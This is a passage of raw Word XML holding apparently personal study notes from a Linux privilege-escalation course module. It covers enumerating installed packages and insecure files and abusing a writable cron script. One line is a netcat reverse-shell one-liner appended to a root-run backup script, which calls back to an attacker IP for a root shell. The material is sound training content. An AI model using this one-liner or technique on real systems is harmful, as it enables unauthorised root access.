    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ABF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since an unprivileged user can modify the contents of the backup script, we can edit it and add a reverse shell</w:t>
      </w:r>
      <w:hyperlink r:id="rId894">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId895">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">one-liner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If our plan works, we should receive a root-level reverse shell on our attacking machine after, at most, a one-minute period.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2921000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="238" name="image239.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image239.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89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2AC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1406"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.118.2 1234 &gt;/tmp/f" &gt;&gt; user_backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All we must do now is set up a listener on our Kali Linux machine and wait for the cron job to execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4738688" cy="1389711"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62" name="image71.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image71.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId897"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4738688" cy="1389711"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC5">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the previous listing, the cron job did execute, as well as the reverse shell one-liner. We have successfully elevated our privileges and have access to a root shell on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although this was a simple example, it is not uncommon to find similar situations in the field since administrators are often more focused on pushing systems into production rather than securing script file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ACA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uj1wrxwdmh84" w:id="375"/>
      <w:bookmarkEnd w:id="375"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Installed Programs Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ACB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (18.1.2. Manual Enumeration) (Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ACC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ACD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ACE">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At some point, we may need to leverage an exploit to escalate our local privileges. If so, our search for a working exploit begins with the enumeration of all installed applications, noting the version of each. We can use this information to search for a matching exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ACF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manually searching for this information could be very time consuming and ineffective, so we'll learn how to automate this process in the next section. However, we should know how to manually query installed packages as this is needed to corroborate information obtained during previous enumeration steps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux-based systems use a variety of package managers. For example, Debian-based Linux distributions, like the one in our lab, use</w:t>
      </w:r>
      <w:hyperlink r:id="rId898">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId899">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">dpkg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, while Red Hat-based systems use</w:t>
      </w:r>
      <w:hyperlink r:id="rId900">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId901">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">rpm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To list applications installed by dpkg on our Debian system, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4308442" cy="4605338"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="505" name="image509.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image509.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId902"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4308442" cy="4605338"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1357"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg -l </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This confirms what we expected earlier from enumerating listening ports: the Debian 10 machine is, in fact, running a web server. In this case, it is running Apache2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AD9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To look at a specific program (ex. To find the version of a specific program, you can do the following)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ADA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1229"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg -l | grep &lt;program&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ADB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1229"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Debian</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ADC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1229"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rpm –qa | grep &lt;program&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1229"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On RPM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ADE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1229"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;program&gt; --version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ADF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1229"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;program&gt; -v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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E2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e6o4a5hlp2je" w:id="376"/>
      <w:bookmarkEnd w:id="376"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure File Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX (18.1.2. Manual Enumeration) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE4">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As we previously mentioned, files with insufficient access restrictions can create a vulnerability that may grant an attacker elevated privileges. This most often happens when an attacker can modify scripts or binary files that are executed under the context of a privileged account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sensitive files that are readable by an unprivileged user may also contain important information such as hard-coded credentials for a database or a service account running with higher privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since it is not feasible to manually check the permissions of each file and directory, we need to automate this task as much as possible. As a start, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId903">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId904">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">find</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify files with insecure permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the example below, we are searching for every directory writable by the current user on the target system. We'll search the whole root directory (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-writable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument to specify the attribute we are interested in. We can also use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-type d</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to locate directories, and filter errors with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
